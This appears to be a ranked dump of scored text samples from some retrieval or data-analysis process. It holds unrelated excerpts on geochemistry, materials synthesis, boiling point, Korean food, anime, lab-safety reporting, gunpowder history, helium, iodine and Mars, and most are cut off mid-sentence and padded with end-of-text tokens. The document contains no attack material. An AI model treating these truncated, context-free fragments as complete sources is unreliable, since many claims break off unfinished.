δ18O in the oceans and in forams. Both records shown in figure 1 are for global deep-sea pelagic fossils, water depths greater than 1,000 meters. + +In the experiments, Bernard, et al. exposed foraminifera tests (shells) to elevated pressures and temperatures when submersed in pure H 2 18O. The forams were then monitored with a micro-mass spectrometer and they observed oxygen-isotope changes. They then attempted to model the isotope diffusion process during sediment burial. Their models suggest that on a time scale of tens of millions of years, the isotopic diffusion could cause ice-free δ18 +================================================================================ +Rank = 27; Score = 1392640.0 +<|begin_of_text|>The SnO 2 /GS Foam was fabricated by a chemical self-assembly strategy and a subsequent freeze-drying process (Fig. 1). At step 1, from the collochemistry, the metal oxide such as Fe 2 O 3, TiO 2 and SnO 2 colloid was positively charged; the GO was negatively charged because GO has many oxygen containing functional groups on the surface35. The GO and SnO 2 nanoparticles were attracted by the electrostatic force so that the SnO 2 nanoparticles can distribute on the surface of GO and not departure by the ultrasonication and stir. At step 2, L-ascorbyl acid was used to reduce oxygen containing functional groups (e.g. carboxyl) on the surface GO, producing in situ reduced GO (rGO). rGO has smaller solubility in water than GO because the reduction of polar oxygen containing functional groups makes GO less hydrophilic. So, as GO sheet began to turn into the rGO, the delocalized π-bond’s conjugative effect would be increased and enlarged. The freshly formed rGO sheets would stack on other rGO sheets as a result of the π–π stacking interactions and self-assembled into a 3D structure. After the chemical reaction and at step 3, there are still many oxygen containing functional groups left on rGO sheets, thus, the SnO 2 nanoparticles with polar surfaces would interact with those functional groups via hydrogen bonding. By annealing at 550 °C, the hydrogen bonds may turn into oxygen bridges between SnO 2 and rGO, forming Sn-O-C bonds. Therefore, the SnO 2 nanoparticles are anchored strongly on the graphene surface through a C-O-Sn bridge, which facilitates the electron transfer and improve the electrode stability. Finally, we obtain a porous ASGF with relative density of ~19 mg cm−3. + +Figure 1: Schematic Illustration of Preparation of ASGF. Full size image + +The morphologies of the as-prepared ASGF were investigated by SEM and TEM. Typical SEM images in Fig. 2A,B show that ASGF possess a 3D structure with interconnected pores ranging from several nanometers to several micrometers. Moreover, the energy dispersive X-ray spectroscopy (EDX) measurement of the ASGF reveals that presence of Sn, O, and C. (Fig. 2E). The TEM images (Fig. 2C,D) show that the SnO +================================================================================ +Rank = 28; Score = 1335296.0 +<|begin_of_text|>This article is about the boiling point of liquids. For other uses, see Boiling point (disambiguation) + +Boiling water + +The boiling point of a substance is the temperature at which the vapor pressure of the liquid equals the pressure surrounding the liquid[1][2] and the liquid changes into a vapor. + +The boiling point of a liquid varies depending upon the surrounding environmental pressure. A liquid in a partial vacuum has a lower boiling point than when that liquid is at atmospheric pressure. A liquid at high pressure has a higher boiling point than when that liquid is at atmospheric pressure. For example, water boils at 100 °C (212 °F) at sea level, but at 93.4 °C (200.1 °F) at 1,905 metres (6,250 ft) [3] altitude. For a given pressure, different liquids will boil at different temperatures. + +The normal boiling point (also called the atmospheric boiling point or the atmospheric pressure boiling point) of a liquid is the special case in which the vapor pressure of the liquid equals the defined atmospheric pressure at sea level, 1 atmosphere.[4][5] At that temperature, the vapor pressure of the liquid becomes sufficient to overcome atmospheric pressure and allow bubbles of vapor to form inside the bulk of the liquid. The standard boiling point has been defined by IUPAC since 1982 as the temperature at which boiling occurs under a pressure of 1 bar.[6] + +The heat of vaporization is the energy required to transform a given quantity (a mol, kg, pound, etc.) of a substance from a liquid into a gas at a given pressure (often atmospheric pressure). + +Liquids may change to a vapor at temperatures below their boiling points through the process of evaporation. Evaporation is a surface phenomenon in which molecules located near the liquid's edge, not contained by enough liquid pressure on that side, escape into the surroundings as vapor. On the other hand, boiling is a process in which molecules anywhere in the liquid escape, resulting in the formation of vapor bubbles within the liquid. + +Saturation temperature and pressure [ edit ] + +Demonstration of the lower boiling point of water at lower pressure, achieved by using a vacuum pump + +A saturated liquid contains as much thermal energy as it can without boiling (or conversely a saturated vapor contains as little thermal energy as it can without condensing). + +Saturation temperature means boiling point. The saturation temperature is the temperature for a corresponding saturation pressure at which a liquid boils into its vapor phase. The liquid can be said +================================================================================ +Rank = 29; Score = 1327104.0 +<|begin_of_text|>Bosintang (boshintang) (보신탕; 補身湯) or gaejangguk (개장국), called dangogiguk (단고기국) in North Korea, is a Korean soup that includes dog meat as its primary ingredient.[1] The soup has been claimed to provide increased virility.[2] The meat is boiled with vegetables such as green onions, perilla leaves, and dandelions, and spices such as Doenjang (된장), Gochujang (고추장), and perilla seed powder.[3] It is seasoned with Agastache rugosa before eating. The dish, one of the most common Korean foods made from dog meat, has a long history in Korean culture, but has in recent years been criticized both inside and outside Korea by people with a food taboo on dog meat. + +History [ edit ] + +The consumption of dog meat can be traced back to antiquity. Dog bones were excavated in a neolithic settlement in Changnyeong (창녕), South Gyeongsang Province. A wall painting in the Goguryeo tombs complex (고구려 고분군; 高句麗 古墳群) in South Hwanghae Province, a UNESCO World Heritage site which dates from 4th century AD, depicts a slaughtered dog in a storehouse (Ahn, 2000).[4] + +Approximately in 1816, Jeong Hak Yu (정학유; 丁學遊), the second son of Jeong Yak-yong (정약용; 丁若鏞), a prominent politician and scholar of Choseon dynasty at the time, wrote a poem called Nongawollyeonga (농가월령가; 農家月令歌). This poem, an important source of Korean folk history, describes what ordinary Korean farmer families did in each month of a year. In the description of August, the poem tells of a married woman visiting her birth parents with boiled dog meat, rice cake, and rice wine, thus showing the popularity of dog meat at the time (Ahn, 2000; Seo, 2002). + +In Dongguk Seshigi (동국세시기; 東國歲時記), a book written by a Korean scholar Hong Suk Mo (홍석모; 洪錫謨) in 1849, contains a recipe of Boshintang including a boiled dog and green +================================================================================ +Rank = 30; Score = 1286144.0 +<|begin_of_text|>Red Data Girl + +Shy 15-year-old Izumiko Suzuhara has trouble fitting in. Not only was she raised by her grandfather at the local shrine with little exposure to the outside world, but modern communication devices like computers or cell phones strangely crash whenever she touches them. After her childhood acquaintance, the handsome but prickly Miyuki Sagara, suddenly reappears and enrolls in her school, Izumiko learns that she is the last vessel of the goddess Himegami, and Miyuki is forced to serve as her guardian. Although the two of fail to get along at the beginning, their meeting marks the beginning of a shift in Izumiko's destiny. + +Funimation Entertainment announced the dub cast for itshome video release during its Anime Boston panel on Saturday. The cast is as follows:Bryn Apprill as Izumiko SuzuharaMicah Solusod as Miyuki SagaraCaitlin Glass as Hime-gamiJoel McDonald as Manatsu SoudaKristi Kang as Mayura SoudaChris Burnett as Masumi SoudaRyan Reynolds as Satoru WamiyaDavid Matranga as Yukimasa SagaraClifford Chapin as Ichijou TakayanagiDave Trosko as RicardoJason Liebrecht as Hodaka MurakamiLeah Clark as Jean Honoka KisaragiFunimation describes the story: + +A Certain Scientific Railgun S + +Ben-To + +A Certain Scientific Railgun S + +Ben-To + +Toshiya Shinohara (Black Butler, Inuyasha films, The Book of Bantorra) directed this Spring 2013 adaptation of Noriko Ogiwara's novels, and Michiko Yokote (Bleach, Gintama, Princess Tutu) handled the scripts. Minako Shiba (Black Butler,.hack franchise, Noir, Letter Bee) adapted Mel Kishida's original character designs. Musicians myu and Masumi Itou (Bungaku Shōjo) scored the soundtrack.Funimation will release the series on DVD on June 17.The company also announced that it will releaseandon home video.will be released in two sets this summer. Funimation streamed, the sequel to the popular series, last April in the United States. The sequel series followed the Sisters arc from the source material. The Japanese Blu-ray release will include an exclusive brand-new anime titled Daiji na Koto wa Zenbu Sentō ni Osowatta (All the Important Things I Learned +================================================================================ +Rank = 31; Score = 1277952.0 +<|begin_of_text|>Image copyright Angélica Gonzalez Image caption The plants, pictured here by co-worker Angélica Gonzalez, underpin a whole ecosystem + +It is hard to imagine you could reconstruct a record of fog dating back thousands of years, but this is exactly what Chilean scientists have done. + +The low-lying cloud is seemingly so transient and intangible, and unlike rivers and glaciers it leaves no easy-to-read impressions on the landscape. + +And yet, a Santiago team has been able to trace the fog history of the Atacama Desert by studying Tillandsia plants. + +Their chemistry suggests strongly that this local fog has increased over time. + +It is a period covering the last 3,500 years. + +"I don't think there's any other place in the world where I've actually seen a record of fog, even spanning the last hundred years," said Claudio Latorre Hidalgo from the Catholic University of Chile. + +"What little we know about fog is from measurement instrumental data that we have, and from satellite data that only spans the last 20 years. + +"So, this is actually a unique opportunity to study the evolution of a fog ecosystem over the Late Holocene, and what are the major drivers and controls of the mechanisms that produce that fog in the long term - the very long term." + +The palaeoclimate expert was discussing his team's research here at the Fall Meeting of the American Geophysical Union - the world's largest annual gathering of Earth scientists. + +Media playback is unsupported on your device Media caption Claudio Latorre Hidalgo: "The fog is the plants’ only source of water and nutrients" + +The Atacama is famous for its super-arid conditions; there are places where it has not rained for years. + +But life can eke out an existence if it can exploit the fog that rolls in off the Pacific. Tillandsia are a perfectly adapted opportunist. + +These wiry, grey plants have no roots. They clutch weakly at sand dunes, but arrange themselves at every spatial scale to maximise their capture of the fog. + +They derive everything they need from the damp air - not simply the must-have water, but also all the chemical nutrients required to underpin their biology. + +Dr Latorre Hidalgo and colleagues have dug deep into the dunes to uncover a multi-millennia succession of Tillandsia; and they have described a pronounced trend: the younger the plants, the more of the lighter type, or isotope, of nitrogen atom that they have incorporated into their tissues. + +Image +================================================================================ +Rank = 32; Score = 1261568.0 +<|begin_of_text|>Chemical equation balancer (JavaScript) + +Input: Balanced: + +Description + +This is an easy-to-use, no-nonsense chemical equation balancer. The program calculates the coefficients to balance your given chemical equation. The algorithm used is Gauss-Jordan elimination, slightly modified to operate using only integer coefficients (not fractions). Because the program is entirely client-side JavaScript code, this web page can be saved and used offline. + +This program was hand-written in JavaScript in year 2011, received minor feature updates and clarifications and refactorings throughout the years, and was ported to TypeScript in 2018. The source TypeScript code and compiled JavaScript code are available for viewing. + +Syntax guide + +Feature Input Equation Demo Subscripts N = N2 N → N 2 Compounds H2 + O2 = H2O H 2 + O 2 → H 2 O Groups Mg(OH)2 = MgO + H2O Mg(OH) 2 → MgO + H 2 O Ions H^+ + CO3^2- = H2O + CO2 H+ + CO 3 2− → H 2 O + CO 2 Electrons Fe^3+ + e = Fe Fe3+ + e− → Fe No space A3^-+B2^2+=A5B+e A 3 − + B 2 2+ → A 5 B + e− More space C 3 H 5 ( O H ) 3 + O 2 = H 2 O + C O 2 C 3 H 5 (OH) 3 + O 2 → H 2 O + CO 2 Optional 1 H1^1+ + e = H1^1- H+ + e− → H− Flexible names Foo^5+ + Bar^3- = FooBar2 + FooBar^- Foo5+ + Bar3− → FooBar 2 + FooBar− + +Error messages + +Syntax error Your input does not describe a proper chemical equation. Check each letter carefully, and follow the examples as a guide to the correct syntax. All-zero solution The only mathematical solution to your equation has all coefficients set to zero, which is a trivial solution for every chemical equation. For example, C → N 2 has no solution because the only solution is 0C → 0N 2. Multiple independent solutions There exist multiple solutions to your equation that are not simply multiples of each other. Your equation can be considered +================================================================================ +Rank = 33; Score = 1253376.0 +<|begin_of_text|>[+]Enlarge Debris littered a lab bench after the explosion. Credit: Honolulu Fire Department + +An explosion last month that caused a University of Hawaii, Manoa, postdoctoral researcher to lose an arm was caused by a spark from a digital pressure gauge that was not designed for use with flammable gases, says a Honolulu Fire Department investigation report. + +Thea Ekins-Coward was combining hydrogen, carbon dioxide, and oxygen gases from high-pressure cylinders into a lower pressure tank when the incident occurred. She has not given the university permission to release information about her condition, said spokesman Daniel Meisenzahl at an April 18 press conference. + +The gas mixture was “food” for bacteria being used to produce biofuels and bioplastics. Ekins-Coward was working for the Hawaii Natural Energy Institute under researcher Jian Yu. A 2013 paper by Yu indicates a set-up in which gases are plumbed through a mixing device called a gas proportioner directly into the bioreactor (Int. J. Hydrogen Energy 2013, DOI: 10.1016/j.ijhydene.2013.04.153). The gas gauge identified in the paper is an “intrinsically safe” model designed to prevent ignition. + +But after Ekins-Coward started in the lab last fall, she purchased a 49-L steel gas tank, a different gauge not rated as intrinsically safe, a pressure-relief valve, and fittings, and she put them together, Yu and Ekins-Coward told fire department investigators, according to the report. Ekins-Coward would add the gases to the portable tank, which would then be connected to the bioreactor. She was using a mixture of 70% hydrogen, 25% oxygen, and 5% carbon dioxide for her experiments, the report says. + +In the week before the incident, a similar set-up with a 3.8-L tank resulted in a “small internal explosion” when Ekins-Coward pressed the off button on the gauge, the fire department report says. She also occasionally experienced static shocks when touching the tank, which was not grounded. She reported the shocks and possibly the small explosion to Yu, who told her not to worry about it, the report says. + +On the day of the incident, the 49-L tank exploded when Ekins-Coward pressed the off button on the gauge. “She did not lose consciousness or hit her head; she was aware that she lost her arm in the explosion,” the report +================================================================================ +Rank = 34; Score = 1212416.0 +<|begin_of_text|>Δραματικά είναι τα στοιχεία για την κατάσταση στην αγορά εργασίας στην χώρας μας με τους άνεργους συμπολίτες μας να αυξάνονται ημέρα με την ημέρα. Τα άτομα ηλικίας άνω των 15 ετών στην Ελλάδα ανέρχονται σε 9,2 εκατομμύρια. Από αυτούς, τα 4,43 εκατ. δεν εργάζονται καθώς ανήκουν στο «μη εργατικό δυναμικό» της χώρας. Στο εργατικό δυναμικό ανήκουν 4,772 εκατ. άτομα, εκ των οποίων εργάζονται 3,648 εκατ., ενώ τα υπόλοιπα 1,124 εκατ. είναι οι άνεργοι.Αν από τους εργαζόμενους αφαιρεθούν και οι περίπου 375 χιλ. που απασχολούνται με μερική απασχόληση -και ως εκ τούτου έχουν καθαρές αμοιβές της τάξεως των 300-400 ευρώ μηνιαίως- τότε μένουν 3,27 εκατ. πολίτες με πλήρη απασχόληση για να συντηρήσουν τους εαυτούς τους, αλλά και τον υπόλοιπο πληθυσμό της χώρας.Έτσι σύμφωνα με την ανάλυση των στοιχείων που πραγματοποίησε η εφημερίδα «Ναυτεμπορική», στην πραγματικότητα, κάθε εργαζόμενος με πλήρη απασχόληση πρέπει να συντηρήσει τρία άτομα, είτε πρόκειται για παιδιά κάτω των 15 ετών είτε για συμπολίτες του που έχουν βρεθεί εκτός αγοράς εργασίας, είτε για συνταξιούχους.Η ποιοτική ανάλυση των δεδομένων που ανακοινώνει η ΕΛΣΤΑΤ για την ανεργία και την απασχόληση αποκαλύπτει το μέγεθος του προβλήματος στην αγορά εργασίας. Ουσιαστικά, το 60% του πληθυσμού της χώρας άνω των 15 ετών δεν εργάζεται και επιβιώνει είτε με τη σύνταξη είτε με τα όποια επιδόματα χορηγεί +================================================================================ +Rank = 35; Score = 1204224.0 +<|begin_of_text|>As we know from our history books, the War for Independence began with the shots fired at Lexington and Concord. Those shots required gunpowder, a substance that was in short supply throughout the colonies. In 1775 there was only one American gunpowder mill, the Frankford Mill in Pennsylvania, and it was turning out a miniscule amount compared to what would be needed to wage a successful war.[1] In addition, this mill was not turning out the high-quality powder needed for artillery use. If the Patriots were going to have any chance of victory, the colonies needed to step up production or import it. Had it not been for the French assistance in supplying the Americans with gunpowder from 1776 throughout the war, American forces would not have been able to fight and win the battles that they did. + +Gunpowder is a mixture of sulfur, charcoal, and potassium nitrate that must be combined in specific ratios. While this sounds simple enough, it must be remembered that in 1775 the state of chemistry was rudimentary. Potassium nitrate itself is a compound of nitrogen and potassium, neither element of which had been identified at that point in time.[2] What they did know was that what they called “nitre” was needed, which, in some recipes, involved soaking soil in urine from both animals and humans, and then allowing it to dry. The dried urine-soil was then boiled to produce saltpeter. Not all recipes agreed with this method which added to the problems in making gunpowder. Unfortunately this required half a year or more to produce nitre-bearing soil and created a bottleneck in the production of gunpowder in America. + +When the War for Independence started American supplies of powder were what they had gathered from Royal sources or their own local supplies. The amount was not enough to sustain an army in the field. While Congress was hopeful that they could establish enough mills to create their own self-sustaining sources of gunpowder, they also decided to seek additional supplies from overseas which meant European suppliers. The Journals of the Continental Congress are full of references to purchasing gunpowder in the West Indies. To do so meant selling American goods which involved adjusting the rules under the Association agreement of 1774. As several congressional delegates noted, gunpowder was needed or else the whole enterprise was lost. A Secret Committee was set up on September 19, 1775 to contract and agree to importation of gunpowder not to exceed 500 tons.[3] +================================================================================ +Rank = 36; Score = 1196032.0 +<|begin_of_text|>It's Elemental + +The Element Helium + +[Click for Isotope Data] + +2 He Helium 4.002602 Atomic Number: 2 Atomic Weight: 4.002602 Melting Point: 0.95 K (-272.2°C or -458.0°F) Boiling Point: 4.22 K (-268.93°C or -452.07°F) Density: 0.0001785 grams per cubic centimeter Phase at Room Temperature: Gas Element Classification: Non-metal Period Number: 1 Group Number: 18 Group Name: Noble Gas + +What's in a name? For the Greek god of the sun, Helios. + +Say what? Helium is pronounced as HEE-lee-em. + +History and Uses: + +Helium, the second most abundant element in the universe, was discovered on the sun before it was found on the earth. Pierre-Jules-César Janssen, a French astronomer, noticed a yellow line in the sun's spectrum while studying a total solar eclipse in 1868. Sir Norman Lockyer, an English astronomer, realized that this line, with a wavelength of 587.49 nanometers, could not be produced by any element known at the time. It was hypothesized that a new element on the sun was responsible for this mysterious yellow emission. This unknown element was named helium by Lockyer. + +The hunt to find helium on earth ended in 1895. Sir William Ramsay, a Scottish chemist, conducted an experiment with a mineral containing uranium called clevite. He exposed the clevite to mineral acids and collected the gases that were produced. He then sent a sample of these gases to two scientists, Lockyer and Sir William Crookes, who were able to identify the helium within it. Two Swedish chemists, Nils Langlet and Per Theodor Cleve, independently found helium in clevite at about the same time as Ramsay. + +Helium makes up about 0.0005% of the earth's atmosphere. This trace amount of helium is not gravitationally bound to the earth and is constantly lost to space. The earth's atmospheric helium is replaced by the decay of radioactive elements in the earth's crust. Alpha decay, one type of radioactive decay, produces particles called alpha particles. An alpha particle can become a helium atom once it captures two electrons from its surroundings. This newly formed helium can eventually work its way to the atmosphere through cracks in the crust. + +Helium is commercially recovered from natural +================================================================================ +Rank = 37; Score = 1130496.0 +<|begin_of_text|>Last updated May 2018 + +Contents + +For the purposes of this article, iodine refers both to iodide (one atom) and iodine (a compound of two iodide atoms). + +Iodine Deficiency and Excess + +Iodine is needed for healthy thyroid function which regulates metabolism. Both too little—and too much—iodine can result in abnormal thyroid metabolism. + +A goiter (enlarged thyroid gland) can be caused by eating both too little or too much iodine. The symptoms of either can be hypothyroidism—in which metabolism slows and weight and cholesterol increases—or hyperthyroidism—where metabolism increases resulting in weight loss. + +An iodine deficiency can inhibit brain development in a fetus, so vegan women should ensure a reliable source of iodine. + +There may be a connection between excess iodine and acne (1, 2), although amounts up to 1,000 µg are considered safe for the majority of population (3). + +Iodine Antagonists + +There are components in soy, flax seeds, and raw cruciferous vegetables (broccoli, brussels sprouts, cauliflower, and cabbage) that counteract iodine. These components, called goitrogens, cause an enlarged thyroid gland, also called a goiter. Thus, large amounts of soy combined with inadequate iodine intake can exacerbate iodine deficiency. + +Iodine Sources + +Iodine is consistently found in only a few foods such as dairy products (iodine solutions are used to clean the cows’ teats and dairy equipment and end up in the milk) and seafood (including seaweed). + +In plant foods, iodine is found inconsistently and depends on the iodine content of the soil—food grown near the ocean tends to be higher in iodine. Commercial plant milks, including those based on soy, almonds, rice, coconuts, pistachios, walnuts, hemp, and cashews are very low in iodine (10, 11). Plant milks fortified with iodine have an iodine content similar to cow’s milk but only a few products are iodine-fortified (11, 12). + +In the United State, iodine is added to iodized salt at a rate of 76 µg per 1/4 teaspoon (1.5 gram) of salt. This amount of salt also provides 580 mg of sodium. + +If salt is iodized, it will say so on the package. The salt found in packaged foods is usually not +================================================================================ +Rank = 38; Score = 1130496.0 +<|begin_of_text|>A report came out yesterday that people are using “stealth USBs” to smuggle South Korean music and dramas to North Korea. The headlines, both in print and on TV, mention G-Dragon’s songs as part of the contents of the USBs. + +[VIDEO] Headline: BIGBANG GD – North Koreans’ Idol? + +The clip shown in the first part of the video is from the movie “Steel Rain”. The child in the video asks her father, who is a North Korean intelligence officer, if he knows GD. + +More from the video: + +From Hallyu Idol to North Koreans’ Idol + +• A source from North Korea says: “In the 90s, they used to sing Kim Beom-ryeong’s “Wind Wind Wind” but these days, songs from idols like BIGBANG and G-Dragon are popular among the North Korean youth.” + +• Stealth USBs are just like regular USBs. They appear to be empty when first plugged into a computer and have to be decrypted to access the contents. + +[PHOTO] Headline: GD songs slip into the North via USB… Kim Jong-un “destroy non-socialism” + +"GD 노래 USB 타고 북으로 퍼져.. 김정은 비사회주의 섬멸하라" ㅋㅋㅋㅋㅋㅋㅋ 지용아 대단해… pic.twitter.com/jPLbzBYJzW — easy👀 (@dldldl0222) December 25, 2017 + +The smuggling of USBs isn’t exactly new and has been going on for years and the sad reality is those who are caught doing this face harsh consequences like getting publicly executed. + +Credits: Via @gd_dragonknight, @dldldl0222, as linked.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 39; Score = 1097728.0 +<|begin_of_text|>Question: What five-note tune might get you a cheerful two-note response if you hum it in the US, but might get you a punch in the nose if you hum it in Mexico? + +Forfeit: Part of the national anthem, La Cucaracha, other traditional American or Mexican songs a Briton might know. + +Answer: "Shave and a Haircut." ( + +Notes: In America (and I think in the UK, too?), the tune can end a song, or you could knock on a door to its rhythm. It was common in old cartoons and was a plot point in the movie "Who Framed Roger Rabbit?" where the cartoon rabbit couldn't stay hidden since all someone had to do was hum "shave and a haircut" to make him respond "two bits." + +The traditional American lyrics are "Shave and a haircut, two bits." As was said in Series E, "two bits" used to mean 25 cents because the Spanish dollar coin, which was used in America about 200 years ago, was cut into 1/8th slices called "bits." Contrary to what was said in Series E, it's not really used to mean a quarter anymore, and the term persists only in the "Shave and a Haircut" lyrics and as an insulting adjective that simply means "inferior." + +In Mexico, however, the lyrics are a lot stronger: "Chinga (a) tu madre, cabron!" (The "a" is slurred with "chinga" so that you don't really hear it.) The translation is roughly, "Go f--k your mother, a--hole!" Most Americans have no clue about the Mexican version, and vice-versa, which could lead to quite an interesting misunderstanding. In Mexico, you can honk your horn to the five-note rhythm instead of using your middle finger. And if you knocked it on a door, it would be like saying, "Open the door, a--hole!" The origin is unclear, but the lyrics are known widely enough to offend. + +Production notes: If nobody gets it, Fry could tap the first five notes on the table to see if anyone taps the next two. Then he could ask if they know the lyrics. + +Sources: + +Wikipedia: Shave and a Haircut + +Wikipedia: Spanish milled dollar + +Translated Spanish explanation What five-note tune might get you a cheerful two-note response if you hum it in the US, but might get you a punch in the nose if you hum +================================================================================ +Rank = 40; Score = 1056768.0 +<|begin_of_text|>An Abundance of Oxygen + +We know that Mars once held entire oceans of water, much like Earth. But that may not be the only thing the two planets have in common. Chemicals found in Martian rocks by NASA’s Curiosity Mars rover suggest the Red Planet once had an abundance of oxygen in its atmosphere. + +Using Curiosity’s ChemCam, researchers found high levels of manganese oxides in mineral veins within a geological setting that the Curiosity mission has placed in a timeline of ancient environmental conditions. ChemCam, or the Chemistry and Camera instrument, fires laser pulses from atop the rover’s mast and observes the spectrum of resulting flashes of plasma to assess targets’ chemical makeup. + +“The only ways on Earth that we know how to make these manganese materials involve atmospheric oxygen or microbes,” said Nina Lanza, a planetary scientist at Los Alamos National Laboratory in New Mexico, in a statement. “Now we’re seeing manganese oxides on Mars, and we’re wondering how the heck these could have formed?” + +Theories and Parallels + +The discovery, published in Geophysical Research Letters, establishes parallels between ancient Mars and Earth. While microbes are not seen as the culprit to Mars’ oxides, a sharp increase in atmospheric oxygen is. And the formation of similar compounds on Earth have marked a turning point from relatively low oxygen abundances to the oxygen-rich atmosphere we see today<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 41; Score = 1044480.0 +<|begin_of_text|>The poison Blue Lagoon: It might look inviting, but the water is almost as toxic as bleach + +Water contains car wrecks, dead animals, excrement and rubbish... but families still go in for a dip + +Lake in former limestone quarry measures pH 11.3, just less than ammonia at 11.5pH and bleach at 12.6pH + +Advertisement + +They call it the Blue Lagoon, and people come from far and wide to cool off in its clear waters. + +Yet the flooded former quarry is so polluted that its contents are almost as toxic as bleach. + +Signs close to the shoreline warn that not only is the water known to contain abandoned cars, dead animals and human waste, but it has a pH level of 11.3 – compared with 12.6 for bleach and 11.5 for ammonia. + +Dangerous: Families pitch up on the banks of the 